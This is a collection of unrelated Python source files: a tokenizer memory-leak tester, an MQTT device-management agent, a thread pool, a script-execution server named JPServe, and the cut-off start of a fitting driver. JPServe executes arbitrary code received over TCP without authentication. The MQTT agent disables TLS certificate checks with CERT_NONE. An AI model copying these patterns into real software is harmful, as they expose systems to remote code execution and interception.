Actual memory leaks typically leak very large amounts of memory (megabytes)
and scale with the number of loops.
"""
from __future__ import unicode_literals, print_function
from locale import LC_ALL, setlocale
from multiprocessing import Process, Pipe
from os import listdir, path
import sys
import psutil
from mwparserfromhell.compat import py3k
from mwparserfromhell.parser._tokenizer import CTokenizer
if sys.version_info[0] == 2:
range = xrange
LOOPS = 10000
class Color(object):
GRAY = "\x1b[30;1m"
GREEN = "\x1b[92m"
YELLOW = "\x1b[93m"
RESET = "\x1b[0m"
class MemoryTest(object):
"""Manages a memory test."""
def __init__(self):
self._tests = []
self._load()
def _parse_file(self, name, text):
tests = text.split("\n---\n")
counter = 1
digits = len(str(len(tests)))
for test in tests:
data = {"name": None, "label": None, "input": None, "output": None}
for line in test.strip().splitlines():
if line.startswith("name:"):
data["name"] = line[len("name:"):].strip()
elif line.startswith("label:"):
data["label"] = line[len("label:"):].strip()
elif line.startswith("input:"):
raw = line[len("input:"):].strip()
if raw[0] == '"' and raw[-1] == '"':
raw = raw[1:-1]
raw = raw.encode("raw_unicode_escape")
data["input"] = raw.decode("unicode_escape")
number = str(counter).zfill(digits)
fname = "test_{0}{1}_{2}".format(name, number, data["name"])
self._tests.append((fname, data["input"]))
counter += 1
def _load(self):
def load_file(filename):
with open(filename, "rU") as fp:
text = fp.read()
if not py3k:
text = text.decode("utf8")
name = path.split(filename)[1][:0-len(extension)]
self._parse_file(name, text)
root = path.split(path.dirname(path.abspath(__file__)))[0]
directory = path.join(root, "tests", "tokenizer")
extension = ".mwtest"
if len(sys.argv) > 2 and sys.argv[1] == "--use":
for name in sys.argv[2:]:
load_file(path.join(directory, name + extension))
sys.argv = [sys.argv[0]] # So unittest doesn't try to load these
else:
for filename in listdir(directory):
if not filename.endswith(extension):
continue
load_file(path.join(directory, filename))
@staticmethod
def _print_results(info1, info2):
r1, r2 = info1.rss, info2.rss
buff = 8192
if r2 - buff > r1:
d = r2 - r1
p = float(d) / r1
bpt = d // LOOPS
tmpl = "{0}LEAKING{1}: {2:n} bytes, {3:.2%} inc ({4:n} bytes/loop)"
sys.stdout.write(tmpl.format(Color.YELLOW, Color.RESET, d, p, bpt))
else:
sys.stdout.write("{0}OK{1}".format(Color.GREEN, Color.RESET))
def run(self):
"""Run the memory test suite."""
width = 1
for (name, _) in self._tests:
if len(name) > width:
width = len(name)
tmpl = "{0}[{1:03}/{2}]{3} {4}: "
for i, (name, text) in enumerate(self._tests, 1):
sys.stdout.write(tmpl.format(Color.GRAY, i, len(self._tests),
Color.RESET, name.ljust(width)))
sys.stdout.flush()
parent, child = Pipe()
p = Process(target=_runner, args=(text, child))
p.start()
try:
proc = psutil.Process(p.pid)
parent.recv()
parent.send("OK")
parent.recv()
info1 = proc.get_memory_info()
sys.stdout.flush()
parent.send("OK")
parent.recv()
info2 = proc.get_memory_info()
self._print_results(info1, info2)
sys.stdout.flush()
parent.send("OK")
finally:
proc.kill()
print()
def _runner(text, child):
r1, r2 = range(250), range(LOOPS)
for i in r1:
CTokenizer().tokenize(text)
child.send("OK")
child.recv()
child.send("OK")
child.recv()
for i in r2:
CTokenizer().tokenize(text)
child.send("OK")
child.recv()
if __name__ == "__main__":
setlocale(LC_ALL, "")
MemoryTest().run()
|
mqtt_agent.py
|
"""
Copyright (c) 2021 Software AG, Darmstadt, Germany and/or its licensors
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import time
import ssl
import _thread
import threading
import paho.mqtt.client as mqtt
import c8ydm.utils.moduleloader as moduleloader
from c8ydm.client.rest_client import RestClient
from c8ydm.core.command import CommandHandler
from c8ydm.core.configuration import ConfigurationManager
from c8ydm.framework.smartrest import SmartRESTMessage
class Agent():
__sensors = []
__listeners = []
__supportedOperations = set()
__supportedTemplates = set()
stopmarker = 0
def __init__(self, serial, path, configuration, pidfile, simulated):
self.logger = logging.getLogger(__name__)
self.serial = serial
self.simulated = simulated
self.__client = mqtt.Client(serial)
self.configuration = configuration
self.pidfile = pidfile
self.path = path
self.url = self.configuration.getValue('mqtt', 'url')
self.port = self.configuration.getValue('mqtt', 'port')
self.ping = self.configuration.getValue(
'mqtt', 'ping.interval.seconds')
self.tls = self.configuration.getBooleanValue('mqtt', 'tls')
self.cacert = self.configuration.getValue('mqtt', 'cacert')
self.cert_auth = self.configuration.getBooleanValue(
'mqtt', 'cert_auth')
self.client_cert = self.configuration.getValue('mqtt', 'client_cert')
self.client_key = self.configuration.getValue('mqtt', 'client_key')
self.interval = int(self.configuration.getValue(
'agent', 'main.loop.interval.seconds'))
self.device_name = f'{self.configuration.getValue("agent", "name")}-{serial}'
self.device_type = self.configuration.getValue('agent', 'type')
self.tedge = self.configuration.getBooleanValue('agent', 'tedge')
self.rest_url = self.configuration.getValue('rest', 'url')
self.stop_event = threading.Event()
self.refresh_token_interval = 60
self.token = None
self.is_connected = False
self.rest_client = RestClient(self)
if self.simulated:
self.model = 'docker'
else:
self.model = 'raspberry'
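# Illustrative sketch (not part of the original agent): the configuration
# object read above is expected to resolve keys roughly like the following
# INI-style layout; section and option names come from the getValue() calls
# in __init__, the values are made-up placeholders.
#
#   [mqtt]
#   url = mqtt.example.com
#   port = 8883
#   ping.interval.seconds = 60
#   tls = true
#   cacert = /etc/ssl/certs/ca-certificates.crt
#   cert_auth = false
#   client_cert =
#   client_key =
#
#   [agent]
#   name = c8ydm-agent
#   type = c8y_dm_example_device
#   main.loop.interval.seconds = 10
#   tedge = false
#
#   [rest]
#   url = https://example.com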
def handle_sensor_message(self, sensor):
messages = sensor.getSensorMessages()
if messages is not None and len(messages) > 0:
for message in messages:
self.publishMessage(message)
def handle_initializer_message(self, initializer):
messages = initializer.getMessages()
if messages is not None and len(messages) > 0:
for message in messages:
if message:
self.logger.debug('Send topic: %s, msg: %s',
message.topic, message.getMessage())
self.publishMessage(message)
def run(self):
try:
self.logger.info('Starting agent')
self.__client = mqtt.Client(self.serial)
credentials = self.configuration.getCredentials()
self.__client = self.connect(
credentials, self.serial, self.url, int(self.port), int(self.ping))
self.__client.loop_start()
while not self.is_connected:
time.sleep(1)
self.logger.debug('Waiting for MQTT Client to be connected')
self.__init_agent()
while not self.stopmarker:
self.logger.debug('New cycle')
self.interval = int(self.configuration.getValue(
'agent', 'main.loop.interval.seconds'))
for sensor in self.__sensors:
sensor_thread = threading.Thread(target=self.handle_sensor_message, args=(sensor,))
sensor_thread.daemon = True
sensor_thread.name = f'SensorThread-{sensor.__class__.__name__}'
sensor_thread.start()
#_thread.start_new_thread(self.handle_sensor_message, (sensor,))
time.sleep(self.interval)
except Exception as e:
self.logger.exception(f'Error in C8Y Agent: {e}')
self.disconnect(self.__client)
self.logger.info('Will retry to connect to C8Y in 5 sec...')
time.sleep(5)
# Run again after 5 sec. delay.
self.run()
def connect(self, credentials, serial, url, port, ping):
try:
self.__client.on_connect = self.__on_connect
self.__client.on_message = self.__on_message
self.__client.on_disconnect = self.__on_disconnect
#self.__client.on_subscribe = self.__on_subscribe
self.__client.on_log = self.__on_log
if self.tls:
if self.cert_auth:
self.logger.debug('Using certificate authentication')
self.__client.tls_set(self.cacert,
certfile=self.client_cert,
keyfile=self.client_key,
tls_version=ssl.PROTOCOL_TLSv1_2,
cert_reqs=ssl.CERT_NONE
)
else:
self.__client.tls_set(self.cacert)
self.__client.username_pw_set(
credentials[0]+'/' + credentials[1], credentials[2])
else:
self.__client.username_pw_set(
credentials[0]+'/' + credentials[1], credentials[2])
self.__client.connect(url, int(port), int(ping))
self.__client.loop_start()
return self.__client
except Exception as e:
self.logger.exception(f'Error on connecting C8Y Agent: {e}')
self.disconnect(self.__client)
self.logger.info('Will retry to connect to C8Y in 5 sec...')
time.sleep(5)
# Run again after 5 sec. delay.
return self.run()
def disconnect(self, client):
self.logger.info("Disconnecting MQTT Client")
self.__client = None
if client == None:
return
client.loop_stop() # stop the loop
client.disconnect()
if self.cert_auth:
self.logger.info("Stopping refresh token thread")
self.stop_event.set()
def stop(self):
msg = SmartRESTMessage('s/us', '400', ['c8y_AgentStopEvent', 'C8Y DM Agent stopped'])
self.publishMessage(msg, qos=0, wait_for_publish=True)
self.disconnect(self.__client)
self.stopmarker = 1
def pollPendingOperations(self):
while not self.stopmarker:
try:
time.sleep(15)
self.logger.debug('Polling for pending Operations')
pending = SmartRESTMessage('s/us', '500', [])
self.publishMessage(pending)
except Exception as e:
self.logger.error(
'Error on polling for Pending Operations: ' + str(e))
def __init_agent(self):
self.__listeners = []
self.__sensors = []
# set Device Name
msgId = '100' if self.tedge else '101'
vals = [self.device_name, self.device_type] if self.tedge else [self.serial, self.device_name, self.device_type]
self.publishMessage(SmartRESTMessage('s/us', msgId, vals), 2, wait_for_publish=True)
#self.__client.publish(
# "s/us", "100,"+self.device_name+","+self.device_type, 2).wait_for_publish()
#self.logger.info(f'Device published!')
commandHandler = CommandHandler(self.serial, self, self.configuration)
configurationManager = ConfigurationManager(
self.serial, self, self.configuration)
messages = configurationManager.getMessages()
for message in messages:
self.logger.debug('Send topic: %s, msg: %s',
message.topic, message.getMessage())
self.__client.publish(message.topic, message.getMessage())
self.__listeners.append(commandHandler)
self.__listeners.append(configurationManager)
self.__supportedOperations.update(
commandHandler.getSupportedOperations())
self.__supportedOperations.update(
configurationManager.getSupportedOperations())
# Load custom modules
modules = moduleloader.findAgentModules()
classCache = {}
for sensor in modules['sensors']:
currentSensor = sensor(self.serial, self)
classCache[sensor.__name__] = currentSensor
self.__sensors.append(currentSensor)
for listener in modules['listeners']:
if listener.__name__ in classCache:
currentListener = classCache[listener.__name__]
else:
currentListener = listener(self.serial, self)
classCache[listener.__name__] = currentListener
supportedOperations = currentListener.getSupportedOperations()
supportedTemplates = currentListener.getSupportedTemplates()
if supportedOperations is not None:
self.__supportedOperations.update(supportedOperations)
if supportedTemplates is not None:
self.__supportedTemplates.update(supportedTemplates)
self.__listeners.append(currentListener)
for initializer in modules['initializers']:
if initializer.__name__ in classCache:
currentInitializer = classCache[initializer.__name__]
else:
currentInitializer = initializer(self.serial, self)
classCache[initializer.__name__] = currentInitializer
init_thread = threading.Thread(target=self.handle_initializer_message, args=(currentInitializer,))
init_thread.daemon = True
init_thread.name = f'InitializerThread-{currentInitializer.__class__.__name__}'
init_thread.start()
#_thread.start_new_thread(self.handle_initializer_message, (currentInitializer,))
classCache = None
# set supported operations
self.logger.info('Supported operations:')
self.logger.info(self.__supportedOperations)
supportedOperationsMsg = SmartRESTMessage(
's/us', 114, list(self.__supportedOperations))
self.publishMessage(supportedOperationsMsg)
# set required interval
required_interval = self.configuration.getValue(
'agent', 'requiredinterval')
self.logger.info(f'Required interval: {required_interval}')
requiredIntervalMsg = SmartRESTMessage(
's/us', 117, [f'{required_interval}'])
self.publishMessage(requiredIntervalMsg)
# set device model
self.logger.info('Model:')
self.logger.info([self.serial, self.model, '1.0'])
modelMsg = SmartRESTMessage(
's/us', 110, [self.serial, self.model, '1.0'])
self.publishMessage(modelMsg)
self.__subscribe('s/e')
self.__subscribe('s/ds')
self.__subscribe('s/dat')
# subscribe additional topics
for xid in self.__supportedTemplates:
self.logger.info('Subscribing to XID: %s', xid)
self.__subscribe('s/dc/' + xid)
if self.cert_auth:
self.logger.info("Starting refresh token thread ")
token_thread = threading.Thread(target=self.refresh_token)
token_thread.daemon = True
token_thread.name = f'TokenThread-1'
token_thread.start()
#_thread.start_new_thread(self.refresh_token)
# refresh_token_thread.start()
# Set all dangling Operations to failed on Agent start
internald_id = self.rest_client.get_internal_id(self.serial)
ops = self.rest_client.get_all_dangling_operations(internald_id)
self.rest_client.set_operations_to_failed(ops)
def __on_connect(self, client, userdata, flags, rc):
try:
self.logger.info('Agent connected with result code: ' + str(rc))
if rc > 0:
self.logger.warning(
'Disconnecting Agent and try to re-connect manually..')
# TODO What should be done when rc != 0? Reconnect? Abort?
self.disconnect(self.__client)
time.sleep(5)
self.logger.info('Restarting Agent ..')
self.run()
else:
self.is_connected = True
except Exception as ex:
self.logger.error(ex)
def __subscribe(self, topic):
topic = f'c8y/{topic}' if self.tedge else topic
self.__client.subscribe(topic)
def __on_message(self, client, userdata, msg):
try:
decoded = msg.payload.decode('utf-8')
messageParts = decoded.split(',')
message = SmartRESTMessage(
msg.topic, messageParts[0], messageParts[1:])
self.logger.debug('Received: topic=%s msg=%s',
message.topic, message.getMessage())
destSerial = messageParts[1]
if message.messageId == '71':
self.token = message.values[0]
self.logger.info('New JWT Token received')
elif message.topic == 's/ds' and destSerial != self.serial:
self.logger.debug(f'ignoring an operation to {destSerial}')
return
for listener in self.__listeners:
self.logger.debug('Trigger listener ' +
listener.__class__.__name__)
listener_thread = threading.Thread(target=listener.handleOperation, args=(message,))
listener_thread.daemon = True
listener_thread.name = f'ListenerThread-{listener.__class__.__name__}'
listener_thread.start()
#_thread.start_new_thread(listener.handleOperation, (message,))
except Exception as e:
self.logger.error(f'Error on handling MQTT Message: {e}')
def __on_disconnect(self, client, userdata, rc):
self.logger.debug("on_disconnect rc: " + str(rc))
# if rc==5:
# self.reset()
# return
if rc != 0:
self.logger.error(f'Disconnected with result code {rc}! Trying to reconnect...')
#self.__client.reconnect()
time.sleep(5)
# Run again after 5 sec. delay.
return self.run()
def __on_log(self, client, userdata, level, buf):
self.logger.log(level, buf)
def publishMessage(self, message, qos=0, wait_for_publish=False):
if self.tedge:
if message.values != [] and message.values[0] == '101':
message.topic = f'c8y/{message.topic}'
else:
message.topic = f'c8y/{message.topic}/{self.serial}'
self.logger.debug(f'Send: topic={message.topic} msg={message.getMessage()}')
if self.__client is not None and self.__client.is_connected():
if wait_for_publish:
self.__client.publish(message.topic, message.getMessage(), qos).wait_for_publish()
else:
self.__client.publish(message.topic, message.getMessage(), qos)
def refresh_token(self):
self.stop_event.clear()
while True:
self.logger.info("Refreshing Token")
self.__client.publish('s/uat','',2)
if self.stop_event.wait(timeout=self.refresh_token_interval):
self.logger.info("Exit Refreshing Token Thread")
break
|
threadpool.py
|
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
Cached thread pool, inspired from Pelix/iPOPO Thread Pool
:author: Thomas Calmant
:copyright: Copyright 2017, Thomas Calmant
:license: Apache License 2.0
:version: 0.3.1
..
Copyright 2017 Thomas Calmant
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Standard library
import logging
import threading
try:
# Python 3
# pylint: disable=F0401
import queue
except ImportError:
# Python 2
# pylint: disable=F0401
import Queue as queue
# ------------------------------------------------------------------------------
# Module version
__version_info__ = (0, 3, 1)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# ------------------------------------------------------------------------------
class EventData(object):
"""
A threading event with some associated data
"""
def __init__(self):
"""
Sets up the event
"""
self.__event = threading.Event()
self.__data = None
self.__exception = None
@property
def data(self):
"""
Returns the associated value
"""
return self.__data
@property
def exception(self):
"""
Returns the exception used to stop the wait() method
"""
return self.__exception
def clear(self):
"""
Clears the event
"""
self.__event.clear()
self.__data = None
self.__exception = None
def is_set(self):
"""
Checks if the event is set
"""
return self.__event.is_set()
def set(self, data=None):
"""
Sets the event
"""
self.__data = data
self.__exception = None
self.__event.set()
def raise_exception(self, exception):
"""
Raises an exception in wait()
:param exception: An Exception object
"""
self.__data = None
self.__exception = exception
self.__event.set()
def wait(self, timeout=None):
"""
Waits for the event or for the timeout
:param timeout: Wait timeout (in seconds)
:return: True if the event has been set, else False
"""
# The 'or' part is for Python 2.6
result = self.__event.wait(timeout)
# pylint: disable=E0702
# Pylint seems to miss the "is None" check below
if self.__exception is None:
return result
else:
raise self.__exception
class FutureResult(object):
"""
An object to wait for the result of a threaded execution
"""
def __init__(self, logger=None):
"""
Sets up the FutureResult object
:param logger: The Logger to use in case of error (optional)
"""
self._logger = logger or logging.getLogger(__name__)
self._done_event = EventData()
self.__callback = None
self.__extra = None
def __notify(self):
"""
Notify the given callback about the result of the execution
"""
if self.__callback is not None:
try:
self.__callback(self._done_event.data,
self._done_event.exception,
self.__extra)
except Exception as ex:
self._logger.exception("Error calling back method: %s", ex)
def set_callback(self, method, extra=None):
"""
Sets a callback method, called once the result has been computed or in
case of exception.
The callback method must have the following signature:
``callback(result, exception, extra)``.
:param method: The method to call back in the end of the execution
:param extra: Extra parameter to be given to the callback method
"""
self.__callback = method
self.__extra = extra
if self._done_event.is_set():
# The execution has already finished
self.__notify()
def execute(self, method, args, kwargs):
"""
Execute the given method and stores its result.
The result is considered "done" even if the method raises an exception
:param method: The method to execute
:param args: Method positional arguments
:param kwargs: Method keyword arguments
:raise Exception: The exception raised by the method
"""
# Normalize arguments
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
# Call the method
result = method(*args, **kwargs)
except Exception as ex:
# Something went wrong: propagate to the event and to the caller
self._done_event.raise_exception(ex)
raise
else:
# Store the result
self._done_event.set(result)
finally:
# In any case: notify the call back (if any)
self.__notify()
def done(self):
"""
Returns True if the job has finished, else False
"""
return self._done_event.is_set()
def result(self, timeout=None):
"""
Waits up to timeout for the result of the threaded job.
Returns immediately the result if the job has already been done.
:param timeout: The maximum time to wait for a result (in seconds)
:raise OSError: The timeout was reached before the job finished
:raise Exception: The exception encountered during the call, if any
"""
if self._done_event.wait(timeout):
return self._done_event.data
else:
raise OSError("Timeout raised")
# ------------------------------------------------------------------------------
class ThreadPool(object):
"""
Executes the tasks stored in a FIFO in a thread pool
"""
def __init__(self, max_threads, min_threads=1, queue_size=0, timeout=60,
logname=None):
"""
Sets up the thread pool.
Threads are kept alive 60 seconds (timeout argument).
:param max_threads: Maximum size of the thread pool
:param min_threads: Minimum size of the thread pool
:param queue_size: Size of the task queue (0 for infinite)
:param timeout: Queue timeout (in seconds, 60s by default)
:param logname: Name of the logger
:raise ValueError: Invalid number of threads
"""
# Validate parameters
try:
max_threads = int(max_threads)
if max_threads < 1:
raise ValueError("Pool size must be greater than 0")
except (TypeError, ValueError) as ex:
raise ValueError("Invalid pool size: {0}".format(ex))
try:
min_threads = int(min_threads)
if min_threads < 0:
min_threads = 0
elif min_threads > max_threads:
min_threads = max_threads
except (TypeError, ValueError) as ex:
raise ValueError("Invalid pool size: {0}".format(ex))
# The logger
self._logger = logging.getLogger(logname or __name__)
# The loop control event
self._done_event = threading.Event()
self._done_event.set()
# The task queue
try:
queue_size = int(queue_size)
except (TypeError, ValueError):
# Not a valid integer
queue_size = 0
self._queue = queue.Queue(queue_size)
self._timeout = timeout
self.__lock = threading.RLock()
# The thread pool
self._min_threads = min_threads
self._max_threads = max_threads
self._threads = []
# Thread count
self._thread_id = 0
# Current number of threads, active and alive,
# and number of task waiting
self.__nb_threads = 0
self.__nb_active_threads = 0
self.__nb_pending_task = 0
def start(self):
"""
Starts the thread pool. Does nothing if the pool is already started.
"""
if not self._done_event.is_set():
# Stop event not set: we're running
return
# Clear the stop event
self._done_event.clear()
# Compute the number of threads to start to handle pending tasks
nb_pending_tasks = self._queue.qsize()
if nb_pending_tasks > self._max_threads:
nb_threads = self._max_threads
nb_pending_tasks = self._max_threads
elif nb_pending_tasks < self._min_threads:
nb_threads = self._min_threads
else:
nb_threads = nb_pending_tasks
# Create the threads
for _ in range(nb_pending_tasks):
self.__nb_pending_task += 1
self.__start_thread()
for _ in range(nb_threads-nb_pending_tasks):
self.__start_thread()
def __start_thread(self):
"""
Starts a new thread, if possible
"""
with self.__lock:
if self.__nb_threads >= self._max_threads:
# Can't create more threads
return False
if self._done_event.is_set():
# We're stopped: do nothing
return False
# Prepare thread and start it
name = "{0}-{1}".format(self._logger.name, self._thread_id)
self._thread_id += 1
thread = threading.Thread(target=self.__run, name=name)
thread.daemon = True
try:
self.__nb_threads += 1
thread.start()
self._threads.append(thread)
return True
except (RuntimeError, OSError):
self.__nb_threads -= 1
return False
def stop(self):
"""
Stops the thread pool. Does nothing if the pool is already stopped.
"""
if self._done_event.is_set():
# Stop event set: we're stopped
return
# Set the stop event
self._done_event.set()
with self.__lock:
# Add something in the queue (to unlock the join())
try:
for _ in self._threads:
self._queue.put(self._done_event, True, self._timeout)
except queue.Full:
# There is already something in the queue
pass
# Copy the list of threads to wait for
threads = self._threads[:]
# Join threads outside the lock
for thread in threads:
while thread.is_alive():
# Wait 3 seconds
thread.join(3)
if thread.is_alive():
# Thread is still alive: something might be wrong
self._logger.warning("Thread %s is still alive...",
thread.name)
# Clear storage
del self._threads[:]
self.clear()
def enqueue(self, method, *args, **kwargs):
"""
Queues a task in the pool
:param method: Method to call
:return: A FutureResult object, to get the result of the task
:raise ValueError: Invalid method
:raise Full: The task queue is full
"""
if not hasattr(method, '__call__'):
raise ValueError("{0} has no __call__ member."
.format(method.__name__))
# Prepare the future result object
future = FutureResult(self._logger)
# Use a lock, as we might be "resetting" the queue
with self.__lock:
# Add the task to the queue
self._queue.put((method, args, kwargs, future), True,
self._timeout)
self.__nb_pending_task += 1
if self.__nb_pending_task > self.__nb_threads:
# All threads are taken: start a new one
self.__start_thread()
return future
def clear(self):
"""
Empties the current queue content.
Returns once the queue has been emptied.
"""
with self.__lock:
# Empty the current queue
try:
while True:
self._queue.get_nowait()
self._queue.task_done()
except queue.Empty:
# Queue is now empty
pass
# Wait for the tasks currently executed
self.join()
def join(self, timeout=None):
"""
Waits for all the tasks to be executed
:param timeout: Maximum time to wait (in seconds)
:return: True if the queue has been emptied, else False
"""
if self._queue.empty():
# Nothing to wait for...
return True
elif timeout is None:
# Use the original join
self._queue.join()
return True
else:
# Wait for the condition
with self._queue.all_tasks_done:
self._queue.all_tasks_done.wait(timeout)
return not bool(self._queue.unfinished_tasks)
def __run(self):
"""
The main loop
"""
while not self._done_event.is_set():
try:
# Wait for an action (blocking)
task = self._queue.get(True, self._timeout)
if task is self._done_event:
# Stop event in the queue: get out
self._queue.task_done()
with self.__lock:
self.__nb_threads -= 1
return
except queue.Empty:
# Nothing to do yet
pass
else:
with self.__lock:
self.__nb_active_threads += 1
# Extract elements
method, args, kwargs, future = task
try:
# Call the method
future.execute(method, args, kwargs)
except Exception as ex:
self._logger.exception("Error executing %s: %s",
method.__name__, ex)
finally:
# Mark the action as executed
self._queue.task_done()
# Thread is not active anymore
with self.__lock:
self.__nb_pending_task -= 1
self.__nb_active_threads -= 1
# Clean up thread if necessary
with self.__lock:
extra_threads = self.__nb_threads - self.__nb_active_threads
if self.__nb_threads > self._min_threads \
and extra_threads > self._queue.qsize():
# No more work for this thread
# if there are more idle threads than queued tasks
# and we're above the minimum number of threads:
# stop this one
self.__nb_threads -= 1
return
with self.__lock:
# Thread stops
self.__nb_threads -= 1
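# Hedged usage sketch (not part of the original module): a minimal demo of the
# ThreadPool / FutureResult flow documented above, guarded so that importing
# the module stays side-effect free.
if __name__ == "__main__":
    def _square(value):
        # trivial task used only for this demonstration
        return value * value
    demo_pool = ThreadPool(max_threads=4, min_threads=1)
    demo_pool.start()
    # enqueue() returns a FutureResult; result() blocks up to the timeout
    demo_future = demo_pool.enqueue(_square, 6)
    print(demo_future.result(timeout=5))  # expected output: 36
    demo_pool.stop()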
|
jpserve.py
|
r"""JPServer is a Python script executor running on the Python side.
JPServe receiving and executing the script from 3rd-part languages,
then send back the result as JSON format to the caller.
Usages:
- Start server
server = JPServe(("hostname", port))
server.start()
- Stop server
server.shutdown()
- Set log level
server.setLogLevel(logging.DEBUG)
- Sample call from the Java side
import net.xdevelop.jpserve.PyClient
import net.xdevelop.jpserve.PyResult
String script = "a = 2\r\n" +
"b = 3\r\n" +
"_result_ = a * b\r\n";
PyClient client = PyClient.getInstance("localhost", "8888");
PyResult rs = client.exec(script);
// output the _result_ value calculated by Python
if (rs.getSuccess()) {
System.out.println(rs.getResult());
}
else {
System.out.println(rs.getMsg());
}
- Calling JPServe directly from Python is also supported
import socket
host = "localhost" #socket.gethostname()
port = 27018 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
f = str(open('tempCode.py').read()).encode('utf-8')
s.sendall("#!{\r\n".encode("utf-8") +
f+
# '_result_ = 1+1'.encode("utf-8") +
"\r\n#!}\r\n".encode("utf-8"))
data = s.recv(1024)
data2 = s.recv(1024)
data3 = s.recv(1024)
s.close()
import json, bson
data2_2 = bson.loads(data2)
import pickle
data2_2_2 = pickle.loads(data2_2['result'])
print('Received', repr(data.decode()) +
repr(data2_2_2) + repr(data3))
# Received '#!{\r\n'array([1, 2, 3, 4])b'\r\n#!}\r\n'
"""
from socketserver import StreamRequestHandler
import logging
import os
if os.name == 'nt':
from socketserver import ThreadingTCPServer
class PThreadingTCPServer(ThreadingTCPServer):
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
"""Constructor. May be extended, do not override."""
ThreadingTCPServer.__init__(self, server_address, RequestHandlerClass)
self.stopped = False
def shutdown(self):
self.stopped = True
ThreadingTCPServer.shutdown(self)
else:
from socketserver import ForkingTCPServer
class PForkingTCPServer(ForkingTCPServer):
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
"""Constructor. May be extended, do not override."""
ForkingTCPServer.__init__(self, server_address, RequestHandlerClass)
self.stopped = False
def shutdown(self):
self.stopped = True
ForkingTCPServer.shutdown(self)
import threading
import json, pickle, bson
__all__ = ["JPServe"]
logger = logging.getLogger('JPServe')
class JPServe():
def __init__(self, server_address, XSON = 'JSON'):
self.server_address = server_address
self.XSON = XSON
import pathlib
logging.basicConfig(level=logging.INFO, filename= pathlib.Path(r'C:\Users\ASUS\Documents\python\JPserve.log'))
logger.setLevel(logging.INFO)
def start(self):
logger.info("JPServe starting...")
if self.XSON == 'JSON':
_ServeHandler = ServeHandlerJ
pass
elif self.XSON == 'BSON':
_ServeHandler = ServeHandlerB
if os.name == 'nt':
self.serv = PThreadingTCPServer(self.server_address, _ServeHandler)
else:
self.serv = PForkingTCPServer(self.server_address, _ServeHandler)
self.t = threading.Thread(target=self.serv.serve_forever)
self.t.start()
logger.info("JPServe listening in %s %s " % self.server_address)
def shutdown(self):
try:
self.serv.shutdown()
self.serv.server_close()
except Exception as e:
logger.error(str(e))
logger.info("JPServe stopped.")
def setLogLevel(self, level):
logger.setLevel(level)
# Constant values for ServerHandler
BEGIN_MARK = b"#!{"
END_MARK = b"#!}"
CMD_EXIT = b"#!exit"
class ServeHandler(StreamRequestHandler):
r""" The handler to receive and exec the python script from 3rd-part side.
Client request syntax:
line0: #!{
line1-n: python script
linen+1: _result_ = the value return to caller
linen+2: #!}
Response to client:
line0: #!{
#!{
{
"result": _result_ value,
"success": true or false,
"msg": "success" or "error message"
}
#!}
Example:
Request:
#!{
a = 2 * 3
_result_= a
#!}
Response:
#!{
{
"result": 6,
"success": true,
"msg": "success"
}
#!}
"""
def handle(self):
self.request.setblocking(False)
while True:
if self.server.stopped:
break
try:
# read begin mark #!{
begin_mark = self.rfile.readline().strip()
if (begin_mark == CMD_EXIT): # end request
logger.info("Client (%s:%d) exit." % (self.client_address[0], self.client_address[1]))
break
if begin_mark != BEGIN_MARK:
continue
# read python script
script = ""
lines = []
while not self.server.stopped:
data = self.rfile.readline()
if data.strip() == END_MARK: # check end mark
break
elif len(data) > 0:
lines.append(data.decode("utf-8"))
script = "".join(lines)
logger.info("Received script from (%s:%d): \n%s" % (self.client_address[0], self.client_address[1], script))
except Exception as e:
logger.error("Read request failed: %s" % str(e))
break
if self.server.stopped:
break
# exec script
local_vars = {}
try:
local_vars["_result_"] = None
exec(compile(script, "<string>", "exec"), globals(), local_vars)
local_vars["_success_"] = True
local_vars["_msg_"] = "success"
except Exception as e:
logger.error("Exec script failed: %s" % str(e))
local_vars["_success_"] = False
local_vars["_msg_"] = "Execute script failed: %s" % str(e)
try:
response = self.toXSON(local_vars)
logger.info("return: %s" % response)
self.wfile.write("#!{\r\n".encode("utf-8"))
self.wfile.write(response)
self.wfile.write("\r\n#!}\r\n".encode("utf-8"))
except Exception as e:
logger.error("Sent result to client failed: %s" % str(e))
break
def toBSON(self, local_vars):
rs = {"success": local_vars["_success_"], "msg": local_vars["_msg_"], "result": pickle.dumps(local_vars["_result_"]) }
response = bson.dumps(rs)
return response
pass
def toJSON(self, local_vars):
rs = {"success": local_vars["_success_"], "msg": local_vars["_msg_"], "result": json.dumps(local_vars["_result_"]) }
response = json.dumps(rs, indent=4)
response = bytes(response, "utf-8")
return response
class ServeHandlerB(ServeHandler):
def __init__(self, *arg, **kwarg):
self.toXSON = self.toBSON
super().__init__( *arg, **kwarg)
self.toXSON = self.toBSON
pass
class ServeHandlerJ(ServeHandler):
def __init__(self, *arg, **kwarg):
self.toXSON = self.toJSON
super().__init__( *arg, **kwarg)
self.toXSON = self.toJSON
pass
if __name__ == "__main__":
host = "localhost"
port = 8888
addr = (host, port)
jpserve = JPServe(addr, XSON = 'BSON')
jpserve.start()
|
run_fit.py
|
#!/usr/bin/python
# run_fit.py - driver for running the fitting codes in parallel
# by launching multiple (12 in this case) jobs
#
#
# Created by Michal Ben-Nun on 5/19/20.
#
import multiprocessing
from multiprocessing import Process
import os
import string
import random
import numpy as np
def info(title):
print title
print 'module name:',__name__
if hasattr(os,'getppid'):
print 'parent process:',os.getppid()
print 'process id: ',os.getpid()
##
## change which R fitting routine to use
